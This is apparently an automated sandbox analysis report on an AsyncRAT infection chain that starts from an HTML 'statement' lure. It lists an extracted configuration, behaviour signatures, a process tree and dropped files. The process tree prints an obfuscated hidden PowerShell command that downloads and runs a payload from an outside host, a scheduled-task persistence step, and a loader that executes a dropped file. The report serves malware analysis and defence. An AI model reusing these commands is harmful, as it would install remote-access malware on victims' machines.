Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/07/2024, 14:00

General

  • Target

    Statment#5173642159.html

  • Size

    1KB

  • MD5

    1231d299fcd9917fde1326f9ef677361

  • SHA1

    f92479f63b0279c16e8499fe294e7b3d81da5942

  • SHA256

    e296925add362ceb26927e02439ad56accc8ce03b14712fbd4dd41377be036aa

  • SHA512

    0b76638bad3c2036c048b4b381a6192a14ed8770545d73ad8d49990ce30bd725b75fa721578e47cad8b946f63cc2e3681014acf72ba4af3598adba9e49345205

Malware Config

Extracted

  • Family

    asyncrat

  • Version

    AWS | 3Losh

  • Botnet

    Elsa3eed

  • Mutex

    AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/C7vDhgZQ

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool, written in C#, designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Statment#5173642159.html
    1⤵
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3500
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab55746f8,0x7ffab5574708,0x7ffab5574718
      2⤵
        PID:4660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        2⤵
          PID:3624
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2520
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
          2⤵
            PID:4916
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
            2⤵
              PID:212
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
              2⤵
                PID:672
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4932 /prefetch:8
                2⤵
                  PID:4584
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
                  2⤵
                    PID:2444
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
                    2⤵
                      PID:4436
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4824
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                      2⤵
                        PID:4704
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
                        2⤵
                          PID:2788
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5092
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
                          2⤵
                            PID:4864
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
                            2⤵
                              PID:1948
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2820
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2212
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4376
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "E:\Statment#386350474.wsf"
                                1⤵
                                • Blocklisted process makes network request
                                • Checks computer location settings
                                • Enumerates connected drives
                                PID:3600
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
                                  2⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1832
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
                                    3⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2872
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
                                    3⤵
                                      PID:2360
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:4856
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4240
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                      3⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2876
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:1496
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4040
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                      3⤵
                                        PID:2256
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                        3⤵
                                          PID:5056


                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      3KB

                                      MD5

                                      f41839a3fe2888c8b3050197bc9a0a05

                                      SHA1

                                      0798941aaf7a53a11ea9ed589752890aee069729

                                      SHA256

                                      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

                                      SHA512

                                      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      210676dde5c0bd984dc057e2333e1075

                                      SHA1

                                      2d2f8c14ee48a2580f852db7ac605f81b5b1399a

                                      SHA256

                                      2a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5

                                      SHA512

                                      aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      f4e6521c03f1bc16d91d99c059cc5424

                                      SHA1

                                      043665051c486192a6eefe6d0632cf34ae8e89ad

                                      SHA256

                                      7759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1

                                      SHA512

                                      0bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      b7c295462c702379bcd69d5ff104d688

                                      SHA1

                                      306f2d407faf0c868283e2a9700e14b5a7674671

                                      SHA256

                                      dddba0851a1ed97fabfc37bbbbf6a795119083acbb7e58de6c916b0c720cc34c

                                      SHA512

                                      bb9cd713e8de351dc18a8e8d517d384f552f341d246c280d6c5fa7bb2fa6bb2f9ee1b8cd25db33eee11ee52170669b5543653f99e26caf153d1481b549cffa67

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      867b10a42e54129af21688c25ae0f299

                                      SHA1

                                      67ab8815a20530bca25cf1401196415b3705da03

                                      SHA256

                                      17640dfa2e7d1b0ea491d686f2d420f4c90e2658ec2342d1bd7d07866b6f9593

                                      SHA512

                                      f19c321e0e815ccb9da4e5e320a4e9b9498056473135b6eb52e70b736897794a2fff492362d28bd5b2c57e3f2267c0989981d26358cdaaff8d45f3097383b02b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      dc09378287d1eae33d8f1ec412a3ced8

                                      SHA1

                                      658568168c28af1e80d1f5f889bef16411d47a02

                                      SHA256

                                      9e2f47c0d9ecc2c3a04361be490f817fcf3e99f3da8f440bcfddeb304c225364

                                      SHA512

                                      b584b5a268ed49d1a871502b668883d353dab2b301c9b68e45b65516f2a696cf373f435a553708f03494257514ea90407fc27233de1943de43f8cdcd26aaaca1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      12KB

                                      MD5

                                      7640525a649803e7e666c0453ab2a35f

                                      SHA1

                                      8f4771d10d696fed6779329570c999a776e6bd44

                                      SHA256

                                      aff9d97949406813b21c6ff5e28c68587e55900e1b9134314893d9e0e9034dce

                                      SHA512

                                      1105045893f4dad094acb79194c563621a22f2601b3e3b6e8256be4e170d0d504febbe0632897590ecd87054ba9c8294c84a307ae3b3a364eadfc368405609f7

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      8b56ab7631860454473cf924d0e1da02

                                      SHA1

                                      cd3b8705f1008e1a2a19bd363ab0b291fd9ebd38

                                      SHA256

                                      5624dd2edd0d950b56787cd937043d9c43ad667ac5471090e21cc0d2313eaa18

                                      SHA512

                                      efe7cdf0dad52799a624c33878cacaca5bfeb08bc3fbb78cbdc768b92fa6c83e16b38dfd95a9fa4947d757b9ab276990fee02ae26abdea7b4fd32bf246c74f20

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      456bcc3f57826aa512563ed240ae114d

                                      SHA1

                                      9a139f1afdb517151cf977f75e0537e0365eb06d

                                      SHA256

                                      4d339a35670859c11e9c3d6a930fd38402a8dbb468aad3c7d773a3190c3cdc36

                                      SHA512

                                      a1366a65b6113c342186ab35befee0699fd4e83b66c79bee524d1248738ba9d874254c526d940e846823de13523171e49a0284aa6191327b078db545d3fe9e1f

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bt1b45sh.pav.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\Downloads\Unconfirmed 519947.crdownload

                                      Filesize

                                      1.4MB

                                      MD5

                                      556f847def0cd4a58a5c0b2bed7e167e

                                      SHA1

                                      35a79ffa7513c6bdd26582d1fa6efb3e00a49b16

                                      SHA256

                                      0a8a474a0b9c28bc7454f8cdfc547cd85972b0df75f3d6bf9f98689f9b310778

                                      SHA512

                                      2265fc3e51cc547f775fe35d8aaa4d7b102ccce15800a134530f20a869232c28a57ee1cfa21be0ecbd68dc27770312dfaba8e5aeca28913819b2e8abf5174bc5

                                    • C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

                                      Filesize

                                      1KB

                                      MD5

                                      26913303151afee791eb652db6764fe2

                                      SHA1

                                      49418253140caeacb2a1b5bfac48f4bc8e8d5b24

                                      SHA256

                                      14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

                                      SHA512

                                      5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

                                    • C:\Users\Public\Music\TvMusic.music

                                      Filesize

                                      452KB

                                      MD5

                                      6c396a8cfe36cbdc7eb72c2f6c8b2346

                                      SHA1

                                      6078599b7406607c848e56e162ea79a691a2aff4

                                      SHA256

                                      9f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8

                                      SHA512

                                      7a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b

                                    • C:\Users\Public\Music\TvMusic.vbs

                                      Filesize

                                      229B

                                      MD5

                                      66a1516e1d1e821084441211567d2e87

                                      SHA1

                                      0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

                                      SHA256

                                      d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

                                      SHA512

                                      1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

                                    • memory/1832-125-0x000001A24CD80000-0x000001A24CDA2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/1832-167-0x000001A24D730000-0x000001A24D8F2000-memory.dmp

                                      Filesize

                                      1.8MB

                                    • memory/1832-168-0x000001A24DE30000-0x000001A24E358000-memory.dmp

                                      Filesize

                                      5.2MB

                                    • memory/2876-146-0x0000000000400000-0x0000000000416000-memory.dmp

                                      Filesize

                                      88KB

                                    • memory/2876-149-0x0000000004E90000-0x0000000004EF6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/2876-150-0x00000000052E0000-0x000000000537C000-memory.dmp

                                      Filesize

                                      624KB

                                    • memory/2876-151-0x0000000005B30000-0x00000000060D4000-memory.dmp

                                      Filesize

                                      5.6MB

                                    • memory/2876-152-0x0000000005880000-0x0000000005912000-memory.dmp

                                      Filesize

                                      584KB

                                    • memory/2876-153-0x00000000063E0000-0x00000000063EA000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/4240-145-0x000001C2A5D70000-0x000001C2A5D7C000-memory.dmp

                                      Filesize

                                      48KB